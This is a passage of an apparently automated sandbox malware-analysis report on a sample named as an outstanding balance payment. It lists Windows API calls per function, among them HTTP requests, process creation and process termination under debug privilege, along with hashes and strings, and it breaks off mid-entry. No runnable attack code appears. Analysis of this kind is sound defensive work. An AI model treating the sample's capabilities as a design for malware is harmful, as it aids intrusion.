                                                                  • Opcode Fuzzy Hash: 560e2284d79b0bdad43f17d62042ecbac91be23ee62b0611d2b45f9ed6715546
                                                                  • Instruction Fuzzy Hash: 0E71E83042020ADFCF21DF64CC91ABABBB6FF45394F24427AEE595A166C7319861DF50
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                    • Part of subcall function 0029B63C: GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                    • Part of subcall function 0029B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 002EED3C
                                                                  • ImageList_EndDrag.COMCTL32 ref: 002EED42
                                                                  • ReleaseCapture.USER32 ref: 002EED48
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 002EEDF0
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002EEE03
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 002EEEDC
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 1924731296-2107944366
                                                                  • Opcode ID: 128b68cd046961018127a1450d0441ce51a060976b2fee6c4ee07d2e1cf8c846
                                                                  • Instruction ID: b569f16d22b1e4d9b0cc5147de55138d1c048ecc5eeadfa8e402d5b70a557345
                                                                  • Opcode Fuzzy Hash: 128b68cd046961018127a1450d0441ce51a060976b2fee6c4ee07d2e1cf8c846
                                                                  • Instruction Fuzzy Hash: 3951CA34254300AFD701EF20DC96FAA77E8AB88314F44491EF989972E1DB74E968CF52
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D45FF
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002D462B
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002D466D
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002D4682
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D468F
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002D46BF
                                                                  • InternetCloseHandle.WININET(00000000), ref: 002D4706
                                                                    • Part of subcall function 002D5052: GetLastError.KERNEL32(?,?,002D43CC,00000000,00000000,00000001), ref: 002D5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1241431887-3916222277
                                                                  • Opcode ID: c31643f1a94f2e6fa520d7d7fcc7744cb8b4ec2d1d4b90cfd4c8b25f08aac8dd
                                                                  • Instruction ID: e5bdc8d81cffa356053180e89e44869df4a83d5df6e9dca9dd60a1eb4b30a353
                                                                  • Opcode Fuzzy Hash: c31643f1a94f2e6fa520d7d7fcc7744cb8b4ec2d1d4b90cfd4c8b25f08aac8dd
                                                                  • Instruction Fuzzy Hash: C3415CB1511215BFEB12AF90CC89FBB77ACEF09754F104127FA069A281D7B0DD548BA4
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0031DC00), ref: 002DB715
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0031DC00), ref: 002DB749
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002DB8C1
                                                                  • SysFreeString.OLEAUT32(?), ref: 002DB8EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: b22c065e73265d12cbaec5e7e92207daf12ffc435d149d7e08273cbf2f7149c0
                                                                  • Instruction ID: efc89b6474580c968a7f2db65787a90cb8652938a9bef85e9fe2426dbed249ec
                                                                  • Opcode Fuzzy Hash: b22c065e73265d12cbaec5e7e92207daf12ffc435d149d7e08273cbf2f7149c0
                                                                  • Instruction Fuzzy Hash: 65F14975A10209EFCF05DF94C898EAEB7B9FF49311F11809AF905AB250DB71AE51CB90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002E24F5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002E2688
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002E26AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002E26EC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002E270E
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002E286F
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002E28A1
                                                                  • CloseHandle.KERNEL32(?), ref: 002E28D0
                                                                  • CloseHandle.KERNEL32(?), ref: 002E2947
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: 34c6d4c6c7b2f65a47439b2e2ca1b3ab9f952c2a04e98e2461095d43d1c74a7d
                                                                  • Instruction ID: 53334731f5bddad92c24d92f876ef1010e35fbb0b404f10e99b2f2cff09faeac
                                                                  • Opcode Fuzzy Hash: 34c6d4c6c7b2f65a47439b2e2ca1b3ab9f952c2a04e98e2461095d43d1c74a7d
                                                                  • Instruction Fuzzy Hash: 44D1EF35224341DFCB15EF25C891A6ABBE9BF84310F54855DF88A9B2A2DB30DC58CF52
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002EB3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: eaada85e4e9f9338ec5ce460242a309ad0b8451300679e60cc271e1af08afb6a
                                                                  • Instruction ID: 25a71742fb4d13e10043ba19a254ab5a85372c1f957683ec771769371583da78
                                                                  • Opcode Fuzzy Hash: eaada85e4e9f9338ec5ce460242a309ad0b8451300679e60cc271e1af08afb6a
                                                                  • Instruction Fuzzy Hash: 7351E6305A1285BFEF239F66CC96BAF3B68AB05314FE44052F614D61E1C7B1E9708B50
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002FDB1B
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002FDB3C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002FDB51
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002FDB6E
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002FDB95
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0029A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002FDBA0
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002FDBBD
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0029A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002FDBC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1268354404-0
                                                                  • Opcode ID: 80cbe9bafe7eaf17c6eb1c67dea2cae8ed80d289081084d36c1608d711a83309
                                                                  • Instruction ID: b012217568be0688836615afab245f1cdf8a60cdd19b5ef589c14b2a9856634f
                                                                  • Opcode Fuzzy Hash: 80cbe9bafe7eaf17c6eb1c67dea2cae8ed80d289081084d36c1608d711a83309
                                                                  • Instruction Fuzzy Hash: E5517E30620309EFDF21DF64CC92FAAB7F9AB18754F110529F94696290D7B0ECA0DB90
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C5FA6,?), ref: 002C6EF1
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 002C75CA
                                                                  • _wcscmp.LIBCMT ref: 002C75E2
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C75FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: 17c44beeeff10221d3a4cd58cf1135aa7a6464d8a80c47eb54d74894729c7686
                                                                  • Instruction ID: 83735f8a60db8aee2ec6c10d26c0ea8a334c3326b428fce6ec55c7f0d6a701bc
                                                                  • Opcode Fuzzy Hash: 17c44beeeff10221d3a4cd58cf1135aa7a6464d8a80c47eb54d74894729c7686
                                                                  • Instruction Fuzzy Hash: 965151B2A192195BDF50EF94D881EDE73BCAF08320F1041AEFA05E3041EA7496D9CF64
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 0029EAEB
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 0029EB32
                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 002FDC86
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 002FDCF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: a20442bcba355fff62d01747dcf689c09caeaebe94ece15bf9f7c22452a25620
                                                                  • Instruction ID: 320fffc5d7741a2439e8bb07e2087178d53a3e6365e58551680cd311b503f49b
                                                                  • Opcode Fuzzy Hash: a20442bcba355fff62d01747dcf689c09caeaebe94ece15bf9f7c22452a25620
                                                                  • Instruction Fuzzy Hash: B4412C30235685DADF36CF288DADB3ABADABB41309F1B041EF18746961C6B1F860C711
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB26C
                                                                  • HeapAlloc.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB273
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002BAEF1,00000B00,?,?), ref: 002BB288
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB290
                                                                  • DuplicateHandle.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB293
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002BAEF1,00000B00,?,?), ref: 002BB2A3
                                                                  • GetCurrentProcess.KERNEL32(002BAEF1,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB2AB
                                                                  • DuplicateHandle.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB2AE
                                                                  • CreateThread.KERNEL32(00000000,00000000,002BB2D4,00000000,00000000,00000000), ref: 002BB2C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: d642a04056b438522afd4804fe6e80437e59c65b8cb224daa37b6f177edda1bb
                                                                  • Instruction ID: 852dd7e65e1d8c3dcf1de1ed886860b343de032109363ba6af4b94febc8f8dcb
                                                                  • Opcode Fuzzy Hash: d642a04056b438522afd4804fe6e80437e59c65b8cb224daa37b6f177edda1bb
                                                                  • Instruction Fuzzy Hash: 4C01C9B5241308BFEB11AFA5DC5DF6B7BECEB89711F058452FA05DB1A1CAB49800CB61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: ce81467066de0905b0905e7e75d2a047ab16f3d9cae733937d77acc0ccbfa411
                                                                  • Instruction ID: add580a2e30b996da66121c9bfaa760356c442c745d5b892693d74e8dc4ba810
                                                                  • Opcode Fuzzy Hash: ce81467066de0905b0905e7e75d2a047ab16f3d9cae733937d77acc0ccbfa411
                                                                  • Instruction Fuzzy Hash: 52E1B571A2021B9BDF15DFA4D881EAEB7B9EF48314F24812AE905A7381D770ED51CF90
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • _wcstok.LIBCMT ref: 002D184E
                                                                  • _wcscpy.LIBCMT ref: 002D18DD
                                                                  • _memset.LIBCMT ref: 002D1910
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X$p23l23
                                                                  • API String ID: 774024439-4179860702
                                                                  • Opcode ID: 904264b3ce2799e44adb0f57fc39918fbe33e9142e074db0930ef65892678269
                                                                  • Instruction ID: 815e26836f2ab2496082fc381a9f74b17a3ee288a5014a0db9ee49918847ba0d
                                                                  • Opcode Fuzzy Hash: 904264b3ce2799e44adb0f57fc39918fbe33e9142e074db0930ef65892678269
                                                                  • Instruction Fuzzy Hash: FEC18E355253419FC724EF24C895A9AB7E4BF85354F14492EF89A973A2DB30EC24CF82
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002E9B19
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 002E9B2D
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002E9B47
                                                                  • _wcscat.LIBCMT ref: 002E9BA2
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 002E9BB9
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002E9BE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 2ba94dd8490021c9509f8e43c299c2a98526945fa410506311f73106b0e0f178
                                                                  • Instruction ID: fa132cd289d732215ea356c463db1d559b0eddcd8b73b7548c859fbf284a2272
                                                                  • Opcode Fuzzy Hash: 2ba94dd8490021c9509f8e43c299c2a98526945fa410506311f73106b0e0f178
                                                                  • Instruction Fuzzy Hash: 5441FE70950349ABDB22DFA4CC85BEE77E8EF08350F50042BF549A7292D6719DD4CB60
                                                                  APIs
                                                                    • Part of subcall function 002C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002C6554
                                                                    • Part of subcall function 002C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 002C6564
                                                                    • Part of subcall function 002C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002C65F9
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002E179A
                                                                  • GetLastError.KERNEL32 ref: 002E17AD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002E17D9
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002E1855
                                                                  • GetLastError.KERNEL32(00000000), ref: 002E1860
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002E1895
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 2c7f06c8abe9dc2137a381cf6e7020b5e3e239bda0a505409a76c4aab92cfdc7
                                                                  • Instruction ID: 4e415e80b23f6b04f3a77a48cbebbec2d55e092de14d0a4b6bcba8c888e5e966
                                                                  • Opcode Fuzzy Hash: 2c7f06c8abe9dc2137a381cf6e7020b5e3e239bda0a505409a76c4aab92cfdc7
                                                                  • Instruction Fuzzy Hash: 2141BF75660201AFDB06EF94C8A5F6DB7A5AF04710F0580ADF9069F2C2DBB4E9248F91
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 002C58B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: db7bc0b6cb46a1495ce5e6e3b519fe8edb21b8d1cc677b2d9cc9496c0ce46329
                                                                  • Instruction ID: 2fc438386182ec5ce0f7c8dc6ff36ca9068e62683e3580a3a896ae6e608e2d2f
                                                                  • Opcode Fuzzy Hash: db7bc0b6cb46a1495ce5e6e3b519fe8edb21b8d1cc677b2d9cc9496c0ce46329
                                                                  • Instruction Fuzzy Hash: 2811E735229B53BFE7015E559CC2EAA239C9F16320F20023EF500E6281EBA4FAE04664
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 002CA806
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: a661eaeced07c3bdca8fe9ca8efe191ddd4fe39d1c0ace957ad54dce4ba875c9
                                                                  • Instruction ID: 6ed40a004dca209eaff8211edd2856d2a0188846a3094f3894e1671037b3eea5
                                                                  • Opcode Fuzzy Hash: a661eaeced07c3bdca8fe9ca8efe191ddd4fe39d1c0ace957ad54dce4ba875c9
                                                                  • Instruction Fuzzy Hash: 1DC17875A2120A9FDB00CF98D495BAEB7F4FF08319F20816EE606E7241D774AA51CF91
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002C6B63
